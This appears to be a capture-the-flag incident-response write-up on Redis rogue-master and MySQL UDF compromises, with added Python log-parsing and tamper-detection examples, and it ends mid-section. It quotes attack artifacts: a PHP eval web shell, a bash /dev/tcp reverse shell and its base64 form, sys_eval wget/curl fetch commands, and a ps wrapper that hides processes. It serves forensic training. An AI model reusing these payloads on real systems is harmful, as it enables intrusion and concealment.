flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
```
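A detection pass over the Redis log for the pattern read off by eye above (client-requested REPLICAOF to an outside "master", then a module loaded from a .so), as an added example that is not part of the write-up. The sample lines are a constructed subset modelled on the log above.

```python
"""Added example (not from the write-up): pulling the rogue-master
replication chain out of a Redis log. It records every REPLICAOF that a
client requested (and the client's address), every "Module ... loaded from"
line, and the RDB signature failure that a fake master's payload produces.
The sample log is a constructed subset modelled on the one above."""
import re

SAMPLE_REDIS_LOG = """\
419:M 31 Jul 2023 05:25:31.525 * Ready to accept connections
419:S 31 Jul 2023 05:33:15.065 * REPLICAOF 192.168.100.13:8888 enabled (user request from 'id=3 addr=192.168.200.2:64289 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:33:15.611 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:M 31 Jul 2023 05:34:37.231 * Module system unloaded
"""

# pid:role timestamp level message  (role M=master, S=replica, C=child)
LINE_RE = re.compile(r"^(\d+):([MSC]) (\d{2} \w{3} \d{4} \d{2}:\d{2}:\d{2}\.\d{3}) ([#*-]) (.*)$")
REPLICAOF_RE = re.compile(r"REPLICAOF (\S+):(\d+) enabled .*addr=([\d.]+):(\d+)")
MODULE_RE = re.compile(r"Module '([^']+)' loaded from (\S+)")


def parse_redis_log(text):
    """Return [(role, timestamp, message)] for every well-formed line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((m.group(2), m.group(3), m.group(5)))
    return events


def detect_rogue_replication(text):
    """Summarise the SLAVEOF -> module-load chain as a report dict."""
    report = {"replicaof": [], "clients": set(), "modules": [],
              "wrong_signature": False}
    for role, ts, msg in parse_redis_log(text):
        m = REPLICAOF_RE.search(msg)
        if m:
            report["replicaof"].append({"ts": ts,
                                        "master": f"{m.group(1)}:{m.group(2)}",
                                        "client": m.group(3)})
            report["clients"].add(m.group(3))
        m = MODULE_RE.search(msg)
        if m:
            report["modules"].append({"ts": ts, "name": m.group(1), "path": m.group(2)})
        if "Wrong signature trying to load DB" in msg:
            report["wrong_signature"] = True
    # A client-requested REPLICAOF followed by a module load is the rogue-master
    # signature: a legitimate replica never ends up loading a module this way.
    report["suspicious"] = bool(report["replicaof"] and report["modules"])
    return report
```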
SSH into the server from the local PC and analyze the IP of the attacker's reverse shell; submit the reverse-shell IP as the FLAG;
You can simply look at the many identical IPs earlier in the log; to be more precise, analyze exp.so, or analyze it from the following angle.
Privilege escalation through a Redis database generally takes one of four forms:
- writing an SSH key
- cron jobs
- a reverse shell
- CVE-2022-0543 sandbox-escape command execution (built into the template)
Here we can first rule out the reverse shell and CVE-2022-0543, because reverse shells easily run into problems that cause connection failures.
Check the cron jobs.

Looking in IDA, however,

it turns out to be a reverse shell; linpeass.sh was found on the box, and the reverse-shell cron job can be found the same way.
SSH into the server from the local PC, trace the attacker's username, and find the key string in the tool the attacker used (flag{attacker-username-key-string}; note the key string has the form xxx-xxx-xxx). Submit the username and key string as the FLAG

```
root@ip-10-0-10-3:~# ls -al
total 28
drwx------ 3 root root 4096 Aug 1 2023 .
drwxr-xr-x 18 root root 4096 Jul 22 02:43 ..
-rw------- 1 root root 7 Aug 1 2023 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 75 Jul 31 2023 .selected_editor
drwx------ 2 root root 4096 Jul 31 2023 .ssh
root@ip-10-0-10-3:~# ls -al .ssh
total 12
drwx------ 2 root root 4096 Jul 31 2023 .
drwx------ 3 root root 4096 Aug 1 2023 ..
-rw-r--r-- 1 root root 675 Jul 31 2023 authorized_keys
root@ip-10-0-10-3:~# cat .ssh/authorized_keys
REDIS0009 redis-ver5.0.1
redis-bitsetOused-memXU
𮤭preamble~shB9
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user
```

This gives the username xj-test-user; tracing it on GitHub leads to https://github.com/xj-test-user
where the repository of the Redis attack tool, https://github.com/xj-test-user/redis-rogue-getshell, is found.
Check the commit history at https://github.com/xj-test-user/redis-rogue-getshell/commit/main

```
flag{xj-test-user-wow-you-find-flag}
```
SSH into the server from the local PC and analyze the command the attacker tampered with; submit the key string inside the tampered command as the FLAG;
Listing all files in the bin directory, the ps command is abnormally small:

```
-rwxrwxrwx 1 root root 178 Jul 31 2023 ps
-rwxr-xr-x 1 root root 133432 Jul 31 2023 ps_
```

Look at /usr/bin/ps:

```
root@ip-10-0-10-3:~# cat /usr/bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
```

So the flag:

```
flag{c195i2923381905517d818e313792d196}
```
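The size and permission oddities spotted by eye above, turned into an audit of core tool names, as an added example that is not part of the write-up. The bin directory it inspects is constructed for the demo (not the real /usr/bin) and holds a shell-script `ps` beside the renamed original `ps_`.

```python
"""Added example (not from the write-up): spotting a replaced system binary
like the ps above. It builds a throwaway bin directory, constructed for the
demo rather than the real /usr/bin, holding a shell-script "ps" beside the
renamed original "ps_", then audits a list of core tool names for the signs
seen on the box: world-writable mode, a tiny size, a non-ELF header and a
same-name sibling with a trailing underscore."""
import os
import stat
import tempfile

ELF_MAGIC = b"\x7fELF"
SMALL_BYTES = 1024  # the real ps is >100 KiB; the 178-byte file on the box was the tell


def build_demo_bin():
    """Construct the sample directory: tampered ps, renamed ps_, untouched ls."""
    root = tempfile.mkdtemp(prefix="demo-bin-")

    def write(name, data, mode):
        path = os.path.join(root, name)
        with open(path, "wb") as f:
            f.write(data)
        os.chmod(path, mode)

    write("ps_", ELF_MAGIC + b"\x00" * 4096, 0o755)                       # renamed original
    write("ps", b"#!/bin/bash\nps_ \"$@\" | grep -v 'threadd'\n", 0o777)  # wrapper script
    write("ls", ELF_MAGIC + b"\x00" * 4096, 0o755)                        # clean binary
    return root


def audit_bin_dir(root, names=("ps", "ls", "netstat", "ss", "top")):
    """Return {name: [reasons]} for every audited tool that looks tampered."""
    findings = {}
    present = set(os.listdir(root))
    for name in names:
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            continue
        st = os.stat(path)
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_size < SMALL_BYTES:
            reasons.append(f"suspiciously small ({st.st_size} bytes)")
        with open(path, "rb") as f:
            if f.read(4) != ELF_MAGIC:
                reasons.append("not an ELF binary")
        if name + "_" in present:
            reasons.append(f"sibling {name}_ present, likely the renamed original")
        if reasons:
            findings[name] = reasons
    return findings
```

On a real host, confirm the finding against package checksums with `dpkg -V procps` or `rpm -Va` before trusting any output from that ps.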
Chapter 2: Log Analysis - MySQL Incident Response
1. The shell the attacker wrote first flag{key string}
Go into the web directory and find:

```php
<?php @eval($_POST['a']);?>
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b
```

So the flag:

```
flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}
```
2. The attacker's reverse-shell IP flag{ip}
Since a web service is running, let's look at the web log:

```shell
cat /var/log/apache2/access.log
```

Reading carefully, the activity is mainly SQL injection operations against adminer.php:

```
192.168.200.2 - - [01/Aug/2023:02:07:50 +0000] "GET /adminer.php?username=root HTTP/1.1" 200 3529 "http://192.168.200.31:8005/adminer.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:52 +0000] "GET /adminer.php?username=root&db=mysql HTTP/1.1" 200 6607 "http://192.168.200.31:8005/adminer.php?username=root" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:52 +0000] "GET /adminer.php?username=root&db=mysql&script=db HTTP/1.1" 200 7170 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:54 +0000] "GET /adminer.php?username=root&db=mysql&sql= HTTP/1.1" 200 3570 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:08:05 +0000] "GET /adminer.php?username=root&db=cms&sql= HTTP/1.1" 200 3082 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:08:17 +0000] "POST /sh.php HTTP/1.1" 200 332 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
192.168.200.2 - - [01/Aug/2023:02:08:20 +0000] "POST /sh.php HTTP/1.1" 200 245 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:09:04 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20version()%3B%0A HTTP/1.1" 200 3835 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:09:47 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20load_file(%22%2Fetc%2Fpasswd%22)%3B HTTP/1.1" 200 4287 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20version()%3B%0A" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:07 +0000] "POST /adminer.php?username=root&db=cms&sql=show%20variables%20like%20%27%25plugin%25%27%3B HTTP/1.1" 200 3746 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20load_file(%22%2Fetc%2Fpasswd%22)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:20 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3478 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=show%20variables%20like%20%27%25plugin%25%27%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:28 +0000] "GET /adminer.php?username=root&db=cms&sql= HTTP/1.1" 200 3363 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:30 +0000] "GET /adminer.php?username=root HTTP/1.1" 200 3377 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:31 +0000] "GET /adminer.php?username=root&sql= HTTP/1.1" 200 2866 "http://192.168.200.31:8005/adminer.php?username=root" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:33 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3147 "http://192.168.200.31:8005/adminer.php?username=root&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:00 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 7687 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:34 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 7666 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:54 +0000] "POST /adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B HTTP/1.1" 200 3324 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:00 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3740 "http://192.168.200.31:8005/adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:08 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3298 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3761 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:53 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27curl%20192.168.100.13%3A771%27)%3B HTTP/1.1" 200 3800 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:14:11 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20192.168.100.13%3A771%27)%3B HTTP/1.1" 200 3822 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27curl%20192.168.100.13%3A771%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:31 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B HTTP/1.1" 200 3862 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20192.168.100.13%3A771%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:35 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A777%2F1.sh%27)%3B HTTP/1.1" 200 3875 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:43 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20%2Ftmp%2F%27)%3B HTTP/1.1" 200 3975 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A777%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:57 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 3889 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:17:05 +0000] "POST /sh.php HTTP/1.1" 200 416 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:17:09 +0000] "POST /sh.php HTTP/1.1" 200 470 "-" "Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01"
192.168.200.2 - - [01/Aug/2023:02:17:10 +0000] "POST /sh.php HTTP/1.1" 200 209 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"
192.168.200.2 - - [01/Aug/2023:02:17:37 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B HTTP/1.1" 200 4116 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B HTTP/1.1" 200 4025 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
```
192.168.200.2 - - [01/Aug/2023:02:18:27 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4023 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:37 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4029 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:19:07 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4014 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
|
The sequence centres on staging and executing /tmp/1.sh. Note the two download attempts use wget -o (lowercase), which is wget's log-file option (-O writes the downloaded document), so the first bash /tmp/1.sh at 02:16:57 was not running the intended payload; at 02:18:27 the attacker stops downloading and writes the payload directly with echo ... | base64 -d > /tmp/1.sh, then runs it. Read the file directly, or decode the base64 blob from the log line:

```
root@xuanji:/var/log/apache2# cat /tmp/1.sh
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
```

That reverse-shell one-liner is the flag.
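Reading sys_eval() arguments out of percent-encoded adminer.php requests by eye is error-prone, so the following added example (not part of the original write-up) does it programmatically: it parses the request line, percent-decodes the sql parameter, pulls every sys_eval('...') argument, and decodes echo ... | base64 -d payloads. The four log lines embedded in it are a constructed sample modelled on the access.log entries above, with Referer and User-Agent shortened; they are not a verbatim copy.

```python
"""Reconstruct the attacker's OS commands from adminer.php requests in an Apache access log."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log prefix: client IP, identd, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# sys_eval('...') or sys_eval("...") inside the decoded SQL statement.
SYS_EVAL_RE = re.compile(r"""sys_eval\(\s*(['"])(.*?)\1\s*\)""", re.IGNORECASE | re.DOTALL)
# echo <base64> | base64 -d, optionally followed by a redirect (the pattern used at 02:18).
ECHO_B64_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)\b")

# Constructed sample modelled on the log lines above (Referer "-" and a shortened User-Agent;
# neither field is used here). Not a verbatim copy of the page's log.
SAMPLE_LOG = (
    '192.168.200.2 - - [01/Aug/2023:02:13:00 +0000] "POST /adminer.php?username=root'
    '&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3740 "-" "Mozilla/5.0"\n'
    '192.168.200.2 - - [01/Aug/2023:02:16:31 +0000] "POST /adminer.php?username=root'
    '&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B'
    ' HTTP/1.1" 200 3862 "-" "Mozilla/5.0"\n'
    '192.168.200.2 - - [01/Aug/2023:02:17:05 +0000] "POST /sh.php HTTP/1.1" 200 416 "-" "Mozilla/5.0"\n'
    '192.168.200.2 - - [01/Aug/2023:02:18:27 +0000] "POST /adminer.php?username=root'
    '&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx'
    '%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4023 "-" "Mozilla/5.0"\n'
)


def extract_sys_eval(target):
    """Return the shell command strings passed to sys_eval() in one request target."""
    query = parse_qs(urlsplit(target).query)   # parse_qs percent-decodes the values
    return [cmd for sql in query.get("sql", []) for _quote, cmd in SYS_EVAL_RE.findall(sql)]


def decode_embedded_base64(cmd):
    """If cmd is 'echo <b64> | base64 -d ...', return the decoded payload; otherwise None."""
    m = ECHO_B64_RE.search(cmd)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)              # tolerate stripped padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def reconstruct_commands(log_text):
    """Return a list of (timestamp, client_ip, command, decoded_payload_or_None) in log order."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for cmd in extract_sys_eval(m["target"]):
            events.append((m["ts"], m["ip"], cmd, decode_embedded_base64(cmd)))
    return events


if __name__ == "__main__":
    for ts, ip, cmd, payload in reconstruct_commands(SAMPLE_LOG):
        print(f"{ts} {ip} sys_eval -> {cmd}")
        if payload is not None:
            print(f"    decoded: {payload}")
```

Point it at the real file with reconstruct_commands(open("/var/log/apache2/access.log").read()) to get the whole command timeline in one pass; requests to sh.php carry their payload in the POST body, which the access log does not record, so they yield nothing here.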
3. Full path of the file the attacker used for privilege escalation, submitted as its md5: flag{md5}. Note the expected shape: /xxx/xxx/xxx/xxx/xxx.xx
Looking further in the log directory, there is also a mysql directory:

```bash
cat /var/log/mysql/error.log
```

The error log shows the database server executing system commands, and since the requests above went through sys_eval, this is a MySQL UDF privilege escalation. Back in the web root, find the file that holds the database credentials:
```
root@xuanji:/var/www/html# cat common.php
<?php
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
if(!$conn){
echo "数据库连接失败";   // "database connection failed"
}
```
With those credentials (the root account, hard-coded in the application config), connect to the database:

```
root@xuanji:/var/www/html# mysql -u root -p
Enter password:
```
```
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| cms                |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
```
Switch to the mysql database (use mysql;) and list the registered UDFs in the func table:

```
MariaDB [mysql]> select * from func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.01 sec)
```
The dl column names the shared object behind sys_eval, so the privilege-escalation library is mysqludf.so. Locate it with a filesystem-wide find:

```
root@xuanji:/var/www/html# find / -name "mysqludf.so" 2>/dev/null
/usr/lib/mysql/plugin/mysqludf.so
```
That does not fit the format hint in the question (/xxx/xxx/xxx/xxx/xxx.xx: a three-character name with a two-character extension), so look at the plugin directory itself:

```
root@xuanji:/usr/lib/mysql/plugin# ls -al
total 4752
drwxr-xr-x. 1 mysql mysql      39 Aug  1  2023 .
drwxr-xr-x. 1 root  root       20 Jul 31  2023 ..
-rw-r--r--. 1 mysql mysql   10416 May 16  2019 auth_pam.so
-rw-r--r--. 1 mysql mysql    6464 May 16  2019 auth_socket.so
-rw-r--r--. 1 mysql mysql   10200 May 16  2019 dialog.so
-rw-r--r--. 1 mysql mysql 1600136 May 16  2019 ha_innodb.so
-rw-r--r--. 1 mysql mysql  159304 May 16  2019 handlersocket.so
-rw-r--r--. 1 mysql mysql    6104 May 16  2019 mysql_clear_password.so
-rw-rw-rw-. 1 mysql mysql   10754 Aug  1  2023 mysqludf.so
-rw-r--r--. 1 mysql mysql   39944 May 16  2019 semisync_master.so
-rw-r--r--. 1 mysql mysql   14736 May 16  2019 semisync_slave.so
-rw-r--r--. 1 mysql mysql   55696 May 16  2019 server_audit.so
-rw-r--r--. 1 mysql mysql 2918008 May 16  2019 sphinx.so
-rw-r--r--. 1 mysql mysql   11008 May 16  2019 sql_errlog.so
-rw-rw-rw-. 1 mysql mysql      34 Aug  1  2023 udf.so
```

Two entries stand out from the packaged plugins: mysqludf.so and udf.so are both dated Aug 1 2023 (the day of the attack; everything else is from May 2019) and both are world-writable (-rw-rw-rw-). Strictly, the library mysqld loads is the one named in the func table's dl column, mysqludf.so; udf.so is only 34 bytes, far too small to be a valid ELF shared object. The question's format hint, however, points at udf.so, so the path to submit is:

```
/usr/lib/mysql/plugin/udf.so
```

The md5 of that path string is the flag:

```
flag{b1818bde4e310f3d23f1005185b973e7}
```
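The checks made by eye above (which file the func table really points at, whether a candidate is even a shared object, which files are writable and dated with the attack) are worth scripting when there are more plugin directories or more candidates. The following is an added example, not code from the original write-up: it builds a constructed stand-in for the plugin directory whose names, modes, sizes and dates follow the listing above (the file contents are invented, since the real .so files are not on this page) and triages it.

```python
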